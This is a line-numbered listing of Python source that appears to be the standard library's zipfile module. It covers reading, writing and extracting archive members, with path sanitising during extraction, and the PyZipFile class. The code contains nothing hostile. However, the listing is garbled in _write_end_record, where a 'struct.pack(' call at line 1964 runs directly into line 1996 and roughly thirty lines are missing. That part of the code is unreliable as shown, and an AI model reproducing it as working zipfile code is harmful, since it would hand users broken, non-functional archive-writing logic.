x.extract_version > MAX_EXTRACT_VERSION: 1453 | raise NotImplementedError("zip file version %.1f" % 1454 | (x.extract_version / 10)) 1455 | x.volume, x.internal_attr, x.external_attr = centdir[15:18] 1456 | # Convert date/time code to (year, month, day, hour, min, sec) 1457 | x._raw_time = t 1458 | x.date_time = ( (d>>9)+1980, (d>>5)&0xF, d&0x1F, 1459 | t>>11, (t>>5)&0x3F, (t&0x1F) * 2 ) 1460 | x._decodeExtra(orig_filename_crc) 1461 | x.header_offset = x.header_offset + concat 1462 | self.filelist.append(x) 1463 | self.NameToInfo[x.filename] = x 1464 | 1465 | # update total bytes read from central directory 1466 | total = (total + sizeCentralDir + centdir[_CD_FILENAME_LENGTH] 1467 | + centdir[_CD_EXTRA_FIELD_LENGTH] 1468 | + centdir[_CD_COMMENT_LENGTH]) 1469 | 1470 | if self.debug > 2: 1471 | print("total", total) 1472 | 1473 | 1474 | def namelist(self): 1475 | """Return a list of file names in the archive.""" 1476 | return [data.filename for data in self.filelist] 1477 | 1478 | def infolist(self): 1479 | """Return a list of class ZipInfo instances for files in the 1480 | archive.""" 1481 | return self.filelist 1482 | 1483 | def printdir(self, file=None): 1484 | """Print a table of contents for the zip file.""" 1485 | print("%-46s %19s %12s" % ("File Name", "Modified ", "Size"), 1486 | file=file) 1487 | for zinfo in self.filelist: 1488 | date = "%d-%02d-%02d %02d:%02d:%02d" % zinfo.date_time[:6] 1489 | print("%-46s %s %12d" % (zinfo.filename, date, zinfo.file_size), 1490 | file=file) 1491 | 1492 | def testzip(self): 1493 | """Read all the files and check the CRC. 1494 | 1495 | Return None if all files could be read successfully, or the name 1496 | of the offending file otherwise.""" 1497 | chunk_size = 2 ** 20 1498 | for zinfo in self.filelist: 1499 | try: 1500 | # Read by chunks, to avoid an OverflowError or a 1501 | # MemoryError with very large embedded files. 1502 | with self.open(zinfo.filename, "r") as f: 1503 | while f.read(chunk_size): # Check CRC-32 1504 | pass 1505 | except BadZipFile: 1506 | return zinfo.filename 1507 | 1508 | def getinfo(self, name): 1509 | """Return the instance of ZipInfo given 'name'.""" 1510 | info = self.NameToInfo.get(name) 1511 | if info is None: 1512 | raise KeyError( 1513 | 'There is no item named %r in the archive' % name) 1514 | 1515 | return info 1516 | 1517 | def setpassword(self, pwd): 1518 | """Set default password for encrypted files.""" 1519 | if pwd and not isinstance(pwd, bytes): 1520 | raise TypeError("pwd: expected bytes, got %s" % type(pwd).__name__) 1521 | if pwd: 1522 | self.pwd = pwd 1523 | else: 1524 | self.pwd = None 1525 | 1526 | @property 1527 | def comment(self): 1528 | """The comment text associated with the ZIP file.""" 1529 | return self._comment 1530 | 1531 | @comment.setter 1532 | def comment(self, comment): 1533 | if not isinstance(comment, bytes): 1534 | raise TypeError("comment: expected bytes, got %s" % type(comment).__name__) 1535 | # check for valid comment length 1536 | if len(comment) > ZIP_MAX_COMMENT: 1537 | import warnings 1538 | warnings.warn('Archive comment is too long; truncating to %d bytes' 1539 | % ZIP_MAX_COMMENT, stacklevel=2) 1540 | comment = comment[:ZIP_MAX_COMMENT] 1541 | self._comment = comment 1542 | self._didModify = True 1543 | 1544 | def read(self, name, pwd=None): 1545 | """Return file bytes for name.""" 1546 | with self.open(name, "r", pwd) as fp: 1547 | return fp.read() 1548 | 1549 | def open(self, name, mode="r", pwd=None, *, force_zip64=False): 1550 | """Return file-like object for 'name'. 1551 | 1552 | name is a string for the file name within the ZIP file, or a ZipInfo 1553 | object. 1554 | 1555 | mode should be 'r' to read a file already in the ZIP file, or 'w' to 1556 | write to a file newly added to the archive. 1557 | 1558 | pwd is the password to decrypt files (only used for reading). 1559 | 1560 | When writing, if the file size is not known in advance but may exceed 1561 | 2 GiB, pass force_zip64 to use the ZIP64 format, which can handle large 1562 | files. If the size is known in advance, it is best to pass a ZipInfo 1563 | instance for name, with zinfo.file_size set. 1564 | """ 1565 | if mode not in {"r", "w"}: 1566 | raise ValueError('open() requires mode "r" or "w"') 1567 | if pwd and (mode == "w"): 1568 | raise ValueError("pwd is only supported for reading files") 1569 | if not self.fp: 1570 | raise ValueError( 1571 | "Attempt to use ZIP archive that was already closed") 1572 | 1573 | # Make sure we have an info object 1574 | if isinstance(name, ZipInfo): 1575 | # 'name' is already an info object 1576 | zinfo = name 1577 | elif mode == 'w': 1578 | zinfo = ZipInfo(name) 1579 | zinfo.compress_type = self.compression 1580 | zinfo._compresslevel = self.compresslevel 1581 | else: 1582 | # Get info object for name 1583 | zinfo = self.getinfo(name) 1584 | 1585 | if mode == 'w': 1586 | return self._open_to_write(zinfo, force_zip64=force_zip64) 1587 | 1588 | if self._writing: 1589 | raise ValueError("Can't read from the ZIP file while there " 1590 | "is an open writing handle on it. " 1591 | "Close the writing handle before trying to read.") 1592 | 1593 | # Open for reading: 1594 | self._fileRefCnt += 1 1595 | zef_file = _SharedFile(self.fp, zinfo.header_offset, 1596 | self._fpclose, self._lock, lambda: self._writing) 1597 | try: 1598 | # Skip the file header: 1599 | fheader = zef_file.read(sizeFileHeader) 1600 | if len(fheader) != sizeFileHeader: 1601 | raise BadZipFile("Truncated file header") 1602 | fheader = struct.unpack(structFileHeader, fheader) 1603 | if fheader[_FH_SIGNATURE] != stringFileHeader: 1604 | raise BadZipFile("Bad magic number for file header") 1605 | 1606 | fname = zef_file.read(fheader[_FH_FILENAME_LENGTH]) 1607 | if fheader[_FH_EXTRA_FIELD_LENGTH]: 1608 | zef_file.seek(fheader[_FH_EXTRA_FIELD_LENGTH], whence=1) 1609 | 1610 | if zinfo.flag_bits & _MASK_COMPRESSED_PATCH: 1611 | # Zip 2.7: compressed patched data 1612 | raise NotImplementedError("compressed patched data (flag bit 5)") 1613 | 1614 | if zinfo.flag_bits & _MASK_STRONG_ENCRYPTION: 1615 | # strong encryption 1616 | raise NotImplementedError("strong encryption (flag bit 6)") 1617 | 1618 | if fheader[_FH_GENERAL_PURPOSE_FLAG_BITS] & _MASK_UTF_FILENAME: 1619 | # UTF-8 filename 1620 | fname_str = fname.decode("utf-8") 1621 | else: 1622 | fname_str = fname.decode(self.metadata_encoding or "cp437") 1623 | 1624 | if fname_str != zinfo.orig_filename: 1625 | raise BadZipFile( 1626 | 'File name in directory %r and header %r differ.' 1627 | % (zinfo.orig_filename, fname)) 1628 | 1629 | # check for encrypted flag & handle password 1630 | is_encrypted = zinfo.flag_bits & _MASK_ENCRYPTED 1631 | if is_encrypted: 1632 | if not pwd: 1633 | pwd = self.pwd 1634 | if pwd and not isinstance(pwd, bytes): 1635 | raise TypeError("pwd: expected bytes, got %s" % type(pwd).__name__) 1636 | if not pwd: 1637 | raise RuntimeError("File %r is encrypted, password " 1638 | "required for extraction" % name) 1639 | else: 1640 | pwd = None 1641 | 1642 | return ZipExtFile(zef_file, mode, zinfo, pwd, True) 1643 | except: 1644 | zef_file.close() 1645 | raise 1646 | 1647 | def _open_to_write(self, zinfo, force_zip64=False): 1648 | if force_zip64 and not self._allowZip64: 1649 | raise ValueError( 1650 | "force_zip64 is True, but allowZip64 was False when opening " 1651 | "the ZIP file." 1652 | ) 1653 | if self._writing: 1654 | raise ValueError("Can't write to the ZIP file while there is " 1655 | "another write handle open on it. " 1656 | "Close the first handle before opening another.") 1657 | 1658 | # Size and CRC are overwritten with correct data after processing the file 1659 | zinfo.compress_size = 0 1660 | zinfo.CRC = 0 1661 | 1662 | zinfo.flag_bits = 0x00 1663 | if zinfo.compress_type == ZIP_LZMA: 1664 | # Compressed data includes an end-of-stream (EOS) marker 1665 | zinfo.flag_bits |= _MASK_COMPRESS_OPTION_1 1666 | if not self._seekable: 1667 | zinfo.flag_bits |= _MASK_USE_DATA_DESCRIPTOR 1668 | 1669 | if not zinfo.external_attr: 1670 | zinfo.external_attr = 0o600 << 16 # permissions: ?rw------- 1671 | 1672 | # Compressed size can be larger than uncompressed size 1673 | zip64 = self._allowZip64 and \ 1674 | (force_zip64 or zinfo.file_size * 1.05 > ZIP64_LIMIT) 1675 | 1676 | if self._seekable: 1677 | self.fp.seek(self.start_dir) 1678 | zinfo.header_offset = self.fp.tell() 1679 | 1680 | self._writecheck(zinfo) 1681 | self._didModify = True 1682 | 1683 | self.fp.write(zinfo.FileHeader(zip64)) 1684 | 1685 | self._writing = True 1686 | return _ZipWriteFile(self, zinfo, zip64) 1687 | 1688 | def extract(self, member, path=None, pwd=None): 1689 | """Extract a member from the archive to the current working directory, 1690 | using its full name. Its file information is extracted as accurately 1691 | as possible. `member' may be a filename or a ZipInfo object. You can 1692 | specify a different directory using `path'. 1693 | """ 1694 | if path is None: 1695 | path = os.getcwd() 1696 | else: 1697 | path = os.fspath(path) 1698 | 1699 | return self._extract_member(member, path, pwd) 1700 | 1701 | def extractall(self, path=None, members=None, pwd=None): 1702 | """Extract all members from the archive to the current working 1703 | directory. `path' specifies a different directory to extract to. 1704 | `members' is optional and must be a subset of the list returned 1705 | by namelist(). 1706 | """ 1707 | if members is None: 1708 | members = self.namelist() 1709 | 1710 | if path is None: 1711 | path = os.getcwd() 1712 | else: 1713 | path = os.fspath(path) 1714 | 1715 | for zipinfo in members: 1716 | self._extract_member(zipinfo, path, pwd) 1717 | 1718 | @classmethod 1719 | def _sanitize_windows_name(cls, arcname, pathsep): 1720 | """Replace bad characters and remove trailing dots from parts.""" 1721 | table = cls._windows_illegal_name_trans_table 1722 | if not table: 1723 | illegal = ':<>|"?*' 1724 | table = str.maketrans(illegal, '_' * len(illegal)) 1725 | cls._windows_illegal_name_trans_table = table 1726 | arcname = arcname.translate(table) 1727 | # remove trailing dots and spaces 1728 | arcname = (x.rstrip(' .') for x in arcname.split(pathsep)) 1729 | # rejoin, removing empty parts. 1730 | arcname = pathsep.join(x for x in arcname if x) 1731 | return arcname 1732 | 1733 | def _extract_member(self, member, targetpath, pwd): 1734 | """Extract the ZipInfo object 'member' to a physical 1735 | file on the path targetpath. 1736 | """ 1737 | if not isinstance(member, ZipInfo): 1738 | member = self.getinfo(member) 1739 | 1740 | # build the destination pathname, replacing 1741 | # forward slashes to platform specific separators. 1742 | arcname = member.filename.replace('/', os.path.sep) 1743 | 1744 | if os.path.altsep: 1745 | arcname = arcname.replace(os.path.altsep, os.path.sep) 1746 | # interpret absolute pathname as relative, remove drive letter or 1747 | # UNC path, redundant separators, "." and ".." components. 1748 | arcname = os.path.splitdrive(arcname)[1] 1749 | invalid_path_parts = ('', os.path.curdir, os.path.pardir) 1750 | arcname = os.path.sep.join(x for x in arcname.split(os.path.sep) 1751 | if x not in invalid_path_parts) 1752 | if os.path.sep == '\\': 1753 | # filter illegal characters on Windows 1754 | arcname = self._sanitize_windows_name(arcname, os.path.sep) 1755 | 1756 | if not arcname: 1757 | raise ValueError("Empty filename.") 1758 | 1759 | targetpath = os.path.join(targetpath, arcname) 1760 | targetpath = os.path.normpath(targetpath) 1761 | 1762 | # Create all upper directories if necessary. 1763 | upperdirs = os.path.dirname(targetpath) 1764 | if upperdirs and not os.path.exists(upperdirs): 1765 | os.makedirs(upperdirs) 1766 | 1767 | if member.is_dir(): 1768 | if not os.path.isdir(targetpath): 1769 | os.mkdir(targetpath) 1770 | return targetpath 1771 | 1772 | with self.open(member, pwd=pwd) as source, \ 1773 | open(targetpath, "wb") as target: 1774 | shutil.copyfileobj(source, target) 1775 | 1776 | return targetpath 1777 | 1778 | def _writecheck(self, zinfo): 1779 | """Check for errors before writing a file to the archive.""" 1780 | if zinfo.filename in self.NameToInfo: 1781 | import warnings 1782 | warnings.warn('Duplicate name: %r' % zinfo.filename, stacklevel=3) 1783 | if self.mode not in ('w', 'x', 'a'): 1784 | raise ValueError("write() requires mode 'w', 'x', or 'a'") 1785 | if not self.fp: 1786 | raise ValueError( 1787 | "Attempt to write ZIP archive that was already closed") 1788 | _check_compression(zinfo.compress_type) 1789 | if not self._allowZip64: 1790 | requires_zip64 = None 1791 | if len(self.filelist) >= ZIP_FILECOUNT_LIMIT: 1792 | requires_zip64 = "Files count" 1793 | elif zinfo.file_size > ZIP64_LIMIT: 1794 | requires_zip64 = "Filesize" 1795 | elif zinfo.header_offset > ZIP64_LIMIT: 1796 | requires_zip64 = "Zipfile size" 1797 | if requires_zip64: 1798 | raise LargeZipFile(requires_zip64 + 1799 | " would require ZIP64 extensions") 1800 | 1801 | def write(self, filename, arcname=None, 1802 | compress_type=None, compresslevel=None): 1803 | """Put the bytes from filename into the archive under the name 1804 | arcname.""" 1805 | if not self.fp: 1806 | raise ValueError( 1807 | "Attempt to write to ZIP archive that was already closed") 1808 | if self._writing: 1809 | raise ValueError( 1810 | "Can't write to ZIP archive while an open writing handle exists" 1811 | ) 1812 | 1813 | zinfo = ZipInfo.from_file(filename, arcname, 1814 | strict_timestamps=self._strict_timestamps) 1815 | 1816 | if zinfo.is_dir(): 1817 | zinfo.compress_size = 0 1818 | zinfo.CRC = 0 1819 | self.mkdir(zinfo) 1820 | else: 1821 | if compress_type is not None: 1822 | zinfo.compress_type = compress_type 1823 | else: 1824 | zinfo.compress_type = self.compression 1825 | 1826 | if compresslevel is not None: 1827 | zinfo._compresslevel = compresslevel 1828 | else: 1829 | zinfo._compresslevel = self.compresslevel 1830 | 1831 | with open(filename, "rb") as src, self.open(zinfo, 'w') as dest: 1832 | shutil.copyfileobj(src, dest, 1024*8) 1833 | 1834 | def writestr(self, zinfo_or_arcname, data, 1835 | compress_type=None, compresslevel=None): 1836 | """Write a file into the archive. The contents is 'data', which 1837 | may be either a 'str' or a 'bytes' instance; if it is a 'str', 1838 | it is encoded as UTF-8 first. 1839 | 'zinfo_or_arcname' is either a ZipInfo instance or 1840 | the name of the file in the archive.""" 1841 | if isinstance(data, str): 1842 | data = data.encode("utf-8") 1843 | if not isinstance(zinfo_or_arcname, ZipInfo): 1844 | zinfo = ZipInfo(filename=zinfo_or_arcname, 1845 | date_time=time.localtime(time.time())[:6]) 1846 | zinfo.compress_type = self.compression 1847 | zinfo._compresslevel = self.compresslevel 1848 | if zinfo.filename.endswith('/'): 1849 | zinfo.external_attr = 0o40775 << 16 # drwxrwxr-x 1850 | zinfo.external_attr |= 0x10 # MS-DOS directory flag 1851 | else: 1852 | zinfo.external_attr = 0o600 << 16 # ?rw------- 1853 | else: 1854 | zinfo = zinfo_or_arcname 1855 | 1856 | if not self.fp: 1857 | raise ValueError( 1858 | "Attempt to write to ZIP archive that was already closed") 1859 | if self._writing: 1860 | raise ValueError( 1861 | "Can't write to ZIP archive while an open writing handle exists." 1862 | ) 1863 | 1864 | if compress_type is not None: 1865 | zinfo.compress_type = compress_type 1866 | 1867 | if compresslevel is not None: 1868 | zinfo._compresslevel = compresslevel 1869 | 1870 | zinfo.file_size = len(data) # Uncompressed size 1871 | with self._lock: 1872 | with self.open(zinfo, mode='w') as dest: 1873 | dest.write(data) 1874 | 1875 | def mkdir(self, zinfo_or_directory_name, mode=511): 1876 | """Creates a directory inside the zip archive.""" 1877 | if isinstance(zinfo_or_directory_name, ZipInfo): 1878 | zinfo = zinfo_or_directory_name 1879 | if not zinfo.is_dir(): 1880 | raise ValueError("The given ZipInfo does not describe a directory") 1881 | elif isinstance(zinfo_or_directory_name, str): 1882 | directory_name = zinfo_or_directory_name 1883 | if not directory_name.endswith("/"): 1884 | directory_name += "/" 1885 | zinfo = ZipInfo(directory_name) 1886 | zinfo.compress_size = 0 1887 | zinfo.CRC = 0 1888 | zinfo.external_attr = ((0o40000 | mode) & 0xFFFF) << 16 1889 | zinfo.file_size = 0 1890 | zinfo.external_attr |= 0x10 1891 | else: 1892 | raise TypeError("Expected type str or ZipInfo") 1893 | 1894 | with self._lock: 1895 | if self._seekable: 1896 | self.fp.seek(self.start_dir) 1897 | zinfo.header_offset = self.fp.tell() # Start of header bytes 1898 | if zinfo.compress_type == ZIP_LZMA: 1899 | # Compressed data includes an end-of-stream (EOS) marker 1900 | zinfo.flag_bits |= _MASK_COMPRESS_OPTION_1 1901 | 1902 | self._writecheck(zinfo) 1903 | self._didModify = True 1904 | 1905 | self.filelist.append(zinfo) 1906 | self.NameToInfo[zinfo.filename] = zinfo 1907 | self.fp.write(zinfo.FileHeader(False)) 1908 | self.start_dir = self.fp.tell() 1909 | 1910 | def __del__(self): 1911 | """Call the "close()" method in case the user forgot.""" 1912 | self.close() 1913 | 1914 | def close(self): 1915 | """Close the file, and for mode 'w', 'x' and 'a' write the ending 1916 | records.""" 1917 | if self.fp is None: 1918 | return 1919 | 1920 | if self._writing: 1921 | raise ValueError("Can't close the ZIP file while there is " 1922 | "an open writing handle on it. " 1923 | "Close the writing handle before closing the zip.") 1924 | 1925 | try: 1926 | if self.mode in ('w', 'x', 'a') and self._didModify: # write ending records 1927 | with self._lock: 1928 | if self._seekable: 1929 | self.fp.seek(self.start_dir) 1930 | self._write_end_record() 1931 | finally: 1932 | fp = self.fp 1933 | self.fp = None 1934 | self._fpclose(fp) 1935 | 1936 | def _write_end_record(self): 1937 | for zinfo in self.filelist: # write central directory 1938 | dt = zinfo.date_time 1939 | dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2] 1940 | dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2) 1941 | extra = [] 1942 | if zinfo.file_size > ZIP64_LIMIT \ 1943 | or zinfo.compress_size > ZIP64_LIMIT: 1944 | extra.append(zinfo.file_size) 1945 | extra.append(zinfo.compress_size) 1946 | file_size = 0xffffffff 1947 | compress_size = 0xffffffff 1948 | else: 1949 | file_size = zinfo.file_size 1950 | compress_size = zinfo.compress_size 1951 | 1952 | if zinfo.header_offset > ZIP64_LIMIT: 1953 | extra.append(zinfo.header_offset) 1954 | header_offset = 0xffffffff 1955 | else: 1956 | header_offset = zinfo.header_offset 1957 | 1958 | extra_data = zinfo.extra 1959 | min_version = 0 1960 | if extra: 1961 | # Append a ZIP64 field to the extra's 1962 | extra_data = _strip_extra(extra_data, (1,)) 1963 | extra_data = struct.pack( 1964 | ' ZIP_FILECOUNT_LIMIT: 1997 | requires_zip64 = "Files count" 1998 | elif centDirOffset > ZIP64_LIMIT: 1999 | requires_zip64 = "Central directory offset" 2000 | elif centDirSize > ZIP64_LIMIT: 2001 | requires_zip64 = "Central directory size" 2002 | if requires_zip64: 2003 | # Need to write the ZIP64 end-of-archive records 2004 | if not self._allowZip64: 2005 | raise LargeZipFile(requires_zip64 + 2006 | " would require ZIP64 extensions") 2007 | zip64endrec = struct.pack( 2008 | structEndArchive64, stringEndArchive64, 2009 | 44, 45, 45, 0, 0, centDirCount, centDirCount, 2010 | centDirSize, centDirOffset) 2011 | self.fp.write(zip64endrec) 2012 | 2013 | zip64locrec = struct.pack( 2014 | structEndArchive64Locator, 2015 | stringEndArchive64Locator, 0, pos2, 1) 2016 | self.fp.write(zip64locrec) 2017 | centDirCount = min(centDirCount, 0xFFFF) 2018 | centDirSize = min(centDirSize, 0xFFFFFFFF) 2019 | centDirOffset = min(centDirOffset, 0xFFFFFFFF) 2020 | 2021 | endrec = struct.pack(structEndArchive, stringEndArchive, 2022 | 0, 0, centDirCount, centDirCount, 2023 | centDirSize, centDirOffset, len(self._comment)) 2024 | self.fp.write(endrec) 2025 | self.fp.write(self._comment) 2026 | if self.mode == "a": 2027 | self.fp.truncate() 2028 | self.fp.flush() 2029 | 2030 | def _fpclose(self, fp): 2031 | assert self._fileRefCnt > 0 2032 | self._fileRefCnt -= 1 2033 | if not self._fileRefCnt and not self._filePassed: 2034 | fp.close() 2035 | 2036 | 2037 | class PyZipFile(ZipFile): 2038 | """Class to create ZIP archives with Python library files and packages.""" 2039 | 2040 | def __init__(self, file, mode="r", compression=ZIP_STORED, 2041 | allowZip64=True, optimize=-1): 2042 | ZipFile.__init__(self, file, mode=mode, compression=compression, 2043 | allowZip64=allowZip64) 2044 | self._optimize = optimize 2045 | 2046 | def writepy(self, pathname, basename="", filterfunc=None): 2047 | """Add all files from "pathname" to the ZIP archive. 2048 | 2049 | If pathname is a package directory, search the directory and 2050 | all package subdirectories recursively for all *.py and enter 2051 | the modules into the archive. If pathname is a plain 2052 | directory, listdir *.py and enter all modules. Else, pathname 2053 | must be a Python *.py file and the module will be put into the 2054 | archive. Added modules are always module.pyc. 2055 | This method will compile the module.py into module.pyc if 2056 | necessary. 2057 | If filterfunc(pathname) is given, it is called with every argument. 2058 | When it is False, the file or directory is skipped. 2059 | """ 2060 | pathname = os.fspath(pathname) 2061 | if filterfunc and not filterfunc(pathname): 2062 | if self.debug: 2063 | label = 'path' if os.path.isdir(pathname) else 'file' 2064 | print('%s %r skipped by filterfunc' % (label, pathname)) 2065 | return 2066 | dir, name = os.path.split(pathname) 2067 | if os.path.isdir(pathname): 2068 | initname = os.path.join(pathname, "__init__.py") 2069 | if os.path.isfile(initname): 2070 | # This is a package directory, add it 2071 | if basename: 2072 | basename = "%s/%s" % (basename, name) 2073 | else: 2074 | basename = name 2075 | if self.debug: 2076 | print("Adding package in", pathname, "as", basename) 2077 | fname, arcname = self._get_codename(initname[0:-3], basename) 2078 | if self.debug: 2079 | print("Adding", arcname) 2080 | self.write(fname, arcname) 2081 | dirlist = sorted(os.listdir(pathname)) 2082 | dirlist.remove("__init__.py") 2083 | # Add all *.py files and package subdirectories 2084 | for filename in dirlist: 2085 | path = os.path.join(pathname, filename) 2086 | root, ext = os.path.splitext(filename) 2087 | if os.path.isdir(path): 2088 | if os.path.isfile(os.path.join(path, "__init__.py")): 2089 | # This is a package directory, add it 2090 | self.writepy(path, basename, 2091 | filterfunc=filterfunc) # Recursive call 2092 | elif ext == ".py": 2093 | if filterfunc and not filterfunc(path): 2094 | if self.debug: 2095 | print('file %r skipped by filterfunc' % path) 2096 | continue 2097 | fname, arcname = self._get_codename(path[0:-3], 2098 | basename) 2099 | if self.debug: 2100 | print("Adding", arcname) 2101 | self.write(fname, arcname) 2102 | else: 2103 | # This is NOT a package directory, add its files at top level 2104 | if self.debug: 2105 | print("Adding files from directory", pathname) 2106 | for filename in sorted(os.listdir(pathname)): 2107 | path = os.path.join(pathname, filename) 2108 | root, ext = os.path.splitext(filename) 2109 | if ext == ".py": 2110 | if filterfunc and not filterfunc(path): 2111 | if self.debug: 2112 | print('file %r skipped by filterfunc' % path) 2113 | continue 2114 | fname, arcname = self._get_codename(path[0:-3], 2115 | basename) 2116 | if self.debug: 2117 | print("Adding", arcname) 2118 | self.write(fname, arcname) 2119 | else: 2120 | if pathname[-3:] != ".py": 2121 | raise RuntimeError( 2122 | 'Files added with writepy() must end with ".py"') 2123 | fname, arcname = self._get_codename(pathname[0:-3], basename) 2124 | if self.debug: 2125 | print("Adding file", arcname) 2126 | self.write(fname, arcname) 2127 | 2128 | def _get_codename(self, pathname, basename): 2129 | """Return (filename, archivename) for the path. 2130 | 2131 | Given a module name path, return the correct file path and 2132 | archive name, compiling if necessary. For example, given 2133 | /python/lib/string, return (/python/lib/string.pyc, string). 2134 | """ 2135 | def _compile(file, optimize=-1): 2136 | import py_compile 2137 | if self.debug: 2138 | print("Compiling", file) 2139 | try: 2140 | py_compile.compile(file, doraise=True, optimize=optimize) 2141 | except py_compile.PyCompileError as err: 2142 | print(err.msg) 2143 | return False 2144 | return True 2145 | 2146 | file_py = pathname + ".py" 2147 | file_pyc = pathname + ".pyc" 2148 | pycache_opt0 = importlib.util.cache_from_source(file_py, optimization='') 2149 | pycache_opt1 = importlib.util.cache_from_source(file_py, optimization=1) 2150 | pycache_opt2 = importlib.util.cache_from_source(file_py, optimization=2) 2151 | if self._optimize == -1: 2152 | # legacy mode: use whatever file is present 2153 | if (os.path.isfile(file_pyc) and 2154 | os.stat(file_pyc).st_mtime >= os.stat(file_py).st_mtime): 2155 | # Use .pyc file. 2156 | arcname = fname = file_pyc 2157 | elif (os.path.isfile(pycache_opt0) and 2158 | os.stat(pycache_opt0).st_mtime >= os.stat(file_py).st_mtime): 2159 | # Use the __pycache__/*.pyc file, but write it to the legacy pyc 2160 | # file name in the archive. 2161 | fname = pycache_opt0 2162 | arcname = file_pyc 2163 | elif (os.path.isfile(pycache_opt1) and 2164 | os.stat(pycache_opt1).st_mtime >= os.stat(file_py).st_mtime): 2165 | # Use the __pycache__/*.pyc file, but write it to the legacy pyc 2166 | # file name in the archive. 2167 | fname = pycache_opt1 2168 | arcname = file_pyc 2169 | elif (os.path.isfile(pycache_opt2) and 2170 | os.stat(pycache_opt2).st_mtime >= os.stat(file_py).st_mtime): 2171 | # Use the __pycache__/*.pyc file, but write it to the legacy pyc 2172 | # file name in the archive. 2173 | fname = pycache_opt2 2174 | arcname = file_pyc 2175 | else: 2176 | # Compile py into PEP 3147 pyc file. 2177 | if _compile(file_py): 2178 | if sys.flags.optimize == 0: 2179 | fname = pycache_opt0 2180 | elif sys.flags.optimize == 1: 2181 | fname = pycache_opt1 2182 | else: 2183 | fname = pycache_opt2 2184 | arcname = file_pyc 2185 | else: 2186 | fname = arcname = file_py 2187 | else: 2188 | # new mode: use given optimization level 2189 | if self._optimize == 0: 2190 | fname = pycache_opt0 2191 | arcname = file_pyc 2192 | else: 2193 | arcname = file_pyc 2194 | if self._optimize == 1: 2195 | fname = pycache_opt1 2196 | elif self._optimize == 2: 2197 | fname = pycache_opt2 2198 | else: 2199 | msg = "invalid value for 'optimize': {!r}".format(self._optimize) 2200 | raise ValueError(msg) 2201 | if not (os.path.isfile(fname) and 2202 | os.stat(fname).st_mtime >= os.stat(file_py).st_mtime): 2203 | if not _compile(file_py, optimize=self._optimize): 2204 | fname = arcname = file_py 2205 | archivename = os.path.split(arcname)[1] 2206 | if basename: 2207 | archivename = "%s/%s" % (basename, archivename) 2208 | return (fname, archivename) 2209 | 2210 | 2211 | from ._path import ( # noqa: E402 2212 | Path, 2213 | 2214 | # used privately for tests 2215 | CompleteDirs, # noqa: F401 2216 | ) 2217 | 2218 | # used privately for tests 2219 | from .__main__ import main # noqa: F401, E402 2220 | --------------------------------------------------------------------------------